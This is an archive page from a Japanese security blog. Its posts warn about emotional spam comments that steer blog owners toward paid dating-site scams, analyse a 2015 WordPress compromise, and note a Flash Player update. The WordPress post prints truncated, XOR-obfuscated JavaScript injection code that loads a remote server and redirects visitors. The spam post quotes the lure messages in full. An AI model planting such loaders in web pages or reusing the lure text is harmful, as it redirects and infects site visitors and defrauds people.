無題なログ

セキュリティ情報、迷惑メール、フィッシング詐欺、迷惑ソフト削除、Windows の小ネタを書き出している日本語ブログです~ (*^ー^)ノ

2015/09

grape.sao@i.softbank.jp迷惑コメントスパム危険 悩み相談から出会い系サイト誘導
 
ブログの記事を読んだ感想を装ってコメント欄に投稿されてる”女性”からの怪しいメッセージの正体はナ~ニナニ?
 
grape.sao@i[.]softbank.jp
 
初めまして!
コメント残させてもらっていいものか悩んでいたんですが思い切ってみました
初体験でドキドキ中ですが
お礼の気持ちをまず伝えさせてください☆
本当にありがとうございます!
なぜお礼を伝えるのかと言うと…■■■■さんのブログを読んで心が軽くなりつつあるんです。
ずっと逆三角形の底辺にいる感覚で何をしても這い上がれず、立ち止まっているのに嫌気がさして何とか気持ちをあげようとしても中々上手くは行かなくて
たまたま立ち寄った■■■■さんのブログ見ていたらモヤが薄くなったんです
grape.sao@i[.]softbank.jp
突然ですが私のアドレスになります。少しでも構いませんメールでお話させてもらえないでしょうか?
迷惑に思ったなら書き込みごと削除してしまってください。
 
ファンになってもいいですか?☆
最近、嫌なこと災難のオンパレードでくじけてしまいそうでした。
正念場だと、頑張らなきゃと思っても…心にも体にも力が入らなくて…。
ブログを読むのは元々好きで■■■■さんのブログ読んでいたら不思議と■■■■さんの言葉が入り込んできたんです
私の心はもうモノクロのまま…と思ってたんですけど、■■■■さんが中和というか暖かさをくれた気がします
本当にありがとうございます!!
もしもこのコメントを見てもらえたら…メール頂くことは出来ませんか?
grape.sao@i[.]softbank.jp
突然過ぎてしまうかもしれないんですが話を聞いてもらえたらと思わずにいられなかったです
アドバイスが欲しいわけではなくて、ただただ聞いてもらえたらって思いで残していきます。
※迷惑でしかなかったらコメント消去して下さいね。 
 
ドキドキですが…
初めてこうやって書き込んでみてます
消化出来ない思いがずっと心や頭にあって具合が悪くなるほどだったんです。
でも■■■■さんのブログ読ませてもらい、この嫌な気持ちを消化するきっかけをもらえたんです!
■■■■さんからしたら何気ない言葉で、ピンと来ないかもしれないんですが今の私にはすごく大きな言葉でした☆
本当にありがとうございます
それで少しお願いなんですが…消化できずにいつ悩みを聞いてもらうこと出来ませんか?
堅苦しい相談ではなくて話をちょっとだけでもいいので聞いてもらえないものかな?と思ったんです。
grape.sao@i[.]softbank.jp
私のアドレスです☆ 
いきなりで失礼かもしれませんが…連絡頂けるの待ってます!♪
 
初コメいきなり失礼します☆
緊張していてこうして書き込んでいても考えが上手くまとまらない…というか、変な所があったらすみません(汗)
私、いま岐路に立っている…というよりその分岐点に行きたいのに行けもしないし道さえもわからず苦しくて
自暴自棄一歩手前のような状態でいましたずっと。
そんな中、偶然■■■■さんのブログを知り読ませてもらっていたら
不思議と気持ちが落ち着いてまだはっきりとではないんですが、先にある道がうっすら見えてきた気がするんです
突然だし、困惑させているかもしれませんし迷惑かもしれません。
ですが…お願いです。こんな私の話を少しだけ聞いてもらえないでしょうか?
この状態を解決したいから相談…ではなくてただただ■■■■さんに聞いてもらえたらと思ったんです。
grape.sao@i[.]softbank.jp
ちなみに同性です!
よろしくお願いします
 
感謝の気持ちでいっぱいです!!
拙い言葉でしか表現出来ずすみません。
少しでも伝わればいいのですが…
私、■■■■さんにとても励まされました♪
どん底の深さがわからなくなる程、深いところに閉じ込められてしまったかのように感じる日々を過ごしていたんですが
久しぶりに少し口角をあげることが出来ました
やっぱり何もせずにいたら深みにはまっていくだけなんだなって改めて実感してます。
他の人からしたら本当に小さな一歩だと思うんですが、私にとってはとってもおおきな一歩になりました
grape.sao@i[.]softbank.jp
私のアドレスです。
良かったら連絡もらえませんか?会話を重ねることができたらもっと心が晴れるんじゃないか、そんな予感がしてます
メール待ってますね♪

すみません。
上手く伝えられる自信はないのですが、あぁ好きだなって思いました。■■■■さんのブログ私好みです☆
ありきたりな言葉ばかりで申し訳ないんですがお許しください。
ただただ感謝の気持ちが溢れています
私ですね今が一番人生で最低の時期なんじゃないかと思う程の毎日を過ごしているんです。
そんな中で前を向く気持ちにさえなれず、常に同じ事ばかりを考えて時間が経ってしまい…
進歩のない日々過ごしてました
これから先も変わらないんだろうなって思ってたんですけど…■■■■さんのブログに巡り合えたことで、
行動してみたらほんのすこしでも何かが変わるのかもしれない。
そんな気持ちを持たせてもらいました
grape.sao@i[.]softbank.jp
迷惑だったら削除してください。お話させてもらえたらもっと変われるかなと、思い切って書きました。
メール頂けたら嬉しいです☆
 
感謝の気持ちは赤に近いオレンジ色です☆
何言ってんだ??となってますよね(汗)
私なりにどうにか感謝の気持ちは伝えられないものかと思って考えてみた言葉だったんですが…
ぽかーんとさせてたらすみません
でも本当に■■■■さんが書いたブログにぽかぽかにしてもらえたんです
光さえ届かない部屋に閉じ込められていた…は言い過ぎなのかもしれないんですが、
心境的にはそんな感じで無理やり笑うことさえ出来ない状態だったところから救われました☆
本当に突然ですみません。
ただ私の中でちゃんと感謝の気持ちを伝えないと今までのように立ち止まったままになってしまうかもしれないって危機感があったもので
あの…メールでお話してもらうことって出来ませんか?
grape.sao@i[.]softbank.jp
メール楽しみにしてます
でも迷惑だったら抹消してください。
 
お邪魔してます♪
最初は心の中でお礼をつぶやいていたんですが、思い切ってコメント残してみようかなと思い…
悩みながらも書き込んでいます
初めてなのでルール等がわからないのですが大丈夫でしょうか…(汗)
私の個人的なことになるんですが、簡単に言えば最悪の毎日がエンドレスで続いていて頭の中には疲れたとか嫌だって事しか残らなくなりつつありました…。
今のままじゃダメだって頭の片隅で理解してても、負の気持ちに引っ張られ続けて自分でさえ自分の気持ちが手に負えない状態でした。
たまたま■■■■さんのブログに辿り着けたんですが…もっと早く巡り合えてたらなんて思いました(汗)
すみません突然自分のコトばかり話してしまって、、
grape.sao@i[.]softbank.jp
こんな私ですが…苦しい胸の内だけでも聞いてもらうことは出来ませんか?
アドバイスして欲しいわけではなくて本当に単純に聞いてもらえたら嬉しい気持ちでいます
迷惑だったら本当にすみません。
お暇な時で大丈夫なので連絡もらえたらありがたいです。
 
晴れ間をありがとうございます。
突然すみません!!
でも…私の素直な気持ちです。初コメントでいきなりですが伝えないと後悔が残る気がしたんです。
私、溜息ばかりの毎日で常に頭痛が酷くて前を向きたくても向けない状態が続いていて…(汗)
助けを求めていたのか、自分でもわからないんですが誰かの気持ちや考えに触れたかったのかな
色んなブログをお散歩中に■■■■さんのブログに辿りついたんです☆
上手く言えず申し訳ないんですがブログを読ませてもらっていたら大切な鍵をもらえた気持ちになりました
こうしてコメントを残したのは感謝をきちんと伝えたかったのもあるんですがメールでいいのでほんの少しでも私の話し聞いてもらうことは出来ませんか?
grape.sao@i[.]softbank.jp
突然なので困惑させていたらすみません。
でも連絡してくれるの楽しみに待ってます
 
■■■■ ⇒ Yahoo!ブログで設定してるハンドルネームが反映される!
 
実は、このメッセージはYahoo!ブログのコメント欄に片っ端から機械的に投稿されまくってる迷惑コメントスパムなのです。 <記事の内容にまったく関係なく…
 
ブログをスゴイ褒めつつ悩みの相談を持ちかけ、記載されてるメールアドレスへ直接連絡するよう言葉巧みに誘導してます。
 
~ 不正なコメントに注意を促すブロガーさんたち ~
http://search.blogs.yahoo.co.jp/SEARCH/index.html?p=grape.sao
 
中には迷惑コメントであることに気づかず、メッセージを真に受けて気分も嬉しくなって素で返信されてしまうユーザーさんもいるはず。。。 <困ってる人に手を差し伸べるたくなるのを逆手に取った手口!

狙いは出会い系サイト/サクラサイトへの誘導

仮にも、このメールアドレス宛てに連絡をとってしまうと、「ダンナのDV」とか「元カレのストーカー」に悩んでるという(架空の)お話が展開されます。
 
結局は、このやり取りを継続するため出会い系サイト/サクラサイトへ移動させて登録させるオチが待ってます。 <やり取りするためのポイント購入が必要となる
 
イメージ 1
心のスキを狙った誘いの手口にダマされないよう消費者庁も注意喚起してる
 
インターネット消費者トラブル防止キャンペーン サクラサイトトラブル (消費者庁)
http://www.caa.go.jp/adjustments/internet_trouble/sakura.html
 
詐欺的“サクラサイト商法”トラブルについて (国民生活センター)
http://www.kokusen.go.jp/soudan_now/data/sakurasite.html
 
投稿されたコメントは無視して、サッサと削除しても問題ありません。
関連するブログ記事
このエントリーをはてなブックマークに追加

WordPressブログ改ざん被害 1Aqapkrv'02v JavaScriptコード挿入
 
ブログ作成ツール WordPress を使用してるサイトの改ざん被害のお話が報告されてます。
 
Wordpress header.php var a="'1Aqapkrv'02v{rg injection
https://www.malwareremovalservice.com/wordpress-header-php-var-a1aqapkrv02vrg-injection/
 
The I.T. side of my life: A new WordPress infection: var a="'1Aqapkrv'02v...
http://myitside.blogspot.com/2015/09/a-new-wordpress-infection-var.html
 
Zscaler Research: Compromised WordPress Campaign - Spyware Edition
http://research.zscaler.com/2015/09/compromised-wordpress-campaign-spyware.html
 
何かしら WordPress がらみの脆弱性を悪用し、悪意のある第三者が 不正なJavaScriptコード<BODY>タグの直後に挿入するよう仕込んでるみたい。
<body>
<script type="text/javascript">var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2; 【~中略~】 )'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>
<追記始め>
 
同じ攻撃者による、別の不正なJavaScriptコードの紹介です。 
<body>
<script type="text/javascript">var a = "'1Aqapkrv'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0: 【~中略~】 @'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>
<head>タグ終端の直前に挿入されるタイプです。
    <!-- ###: -->
    <script>var a = "'02'02'02'02'1Aqapkrv'1G'2C'02'02'02'02'02'02'02'02dwlavkml'02qvpkleEgl'0:ngl'0;'5@'2C'02'02'02'02'02'02'02'02'02'02'02'02tcp'02vgzv'02'1F'02'00'00'1@'2C'02'02'02'02'02'02'02'02'02'02'02'02tcp'02ajcpqgv'02'1F'02'00c`afgdejkhinolmrspqvwtuz{ 【~中略~】 {rg'1F'00vgzv-hctcqapkrv'00'02qpa'1F'00'05'02)'02l]wpn'02)'02'05'00'1G'05'02)'02'05'1A'05'02)'02'05-qapkrv'1G'05'0;'1@'2C'02'02'02'02'02'02'02'02'5F'2C'02'02'02'02'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>
    <!-- :### -->
</head>
<追記終わり>
 
JavaScriptコードが処理されると、欧州ラトビアのサーバーにある不審なURLアドレスを裏で読み込みにいきます。
 
https://www.virustotal.com/ja/ip-address/91.226.33.54/information/
 
改ざんされてるブログを閲覧しても変化はない一方で、Google検索経由でブログにアクセスすると広告ページ(2015 年年次訪問者調査)ヘ強制的に飛ばされました。
 
イメージ 5
 
Google検索
 ↓
(改ざんされてるブログ)
 ↓
http //kfc.i.illuminationes[.]com/snitch?default_keyword= ~
http //c11n4.i.teaserguide[.]com/snitch?default_keyword= ~
 ↓
http //c11n4.i.teaserguide[.]com/in/?_BC= ~
 ↓
怪しげな広告ページへ
 
この改ざん被害は、日本語表記の一般サイトでも目にする機会があって、けっこう複数殺られてる感じ?
 
イメージ 1
 
イメージ 2
 
複数の不正なJavaScriptコードが挿入されてるパターンも。
 
イメージ 3
 
イメージ 4
 
改ざんされてるブログをたまたま踏んだ場合にセキュリティソフトが警告するウイルス検出名はこんな感じ。
 
AVG HTML/Framer
BitDefender Trojan.Script.CPY
Kaspersky Trojan-Downloader.JS.Iframe.diq
McAfee JS/Agent.a
Microsoft Trojan:JS/Iframeinject.AE
Sophos Troj/Iframe-NM
関連するブログ記事
リダイレクト改ざんvar a setTimeout(10) default_keyword encodeURIComponent JavaScriptコード ( WEBサイト・CGI )
このエントリーをはてなブックマークに追加

Flash Player 19.0.0.185リリース ウイルス感染経路なので更新重要
 
イメージ 2旧バージョンがウイルス感染経路の1つになってる無料ブラウザアドオン Adobe Flash Player の最新バージョンがリリース~。
 
バージョン 19.0.0.185
 
深刻なものも含む23件の脆弱性の修正が行われていて、公開時点ではゼロデイ攻撃は始まってないみたい。
 
Security updates available for Adobe Flash Player APSB15-23 - Adobe Security Bulletin
https://helpx.adobe.com/security/products/flash-player/apsb15-23.html
 
ただ、近い将来に修正された脆弱性を悪用したウイルス感染攻撃がさっそく始まるやもしれん。
 
 
イメージ 1
 
2015年前半にWindowsパソコンを狙ったドライブバイ・ダウンロード攻撃によるウイルス強制感染は、Adobe Flash Player の脆弱性を経由する手口がとにかくヒドいみたいで。。。
関連するブログ記事
このエントリーをはてなブックマークに追加

↑このページのトップヘ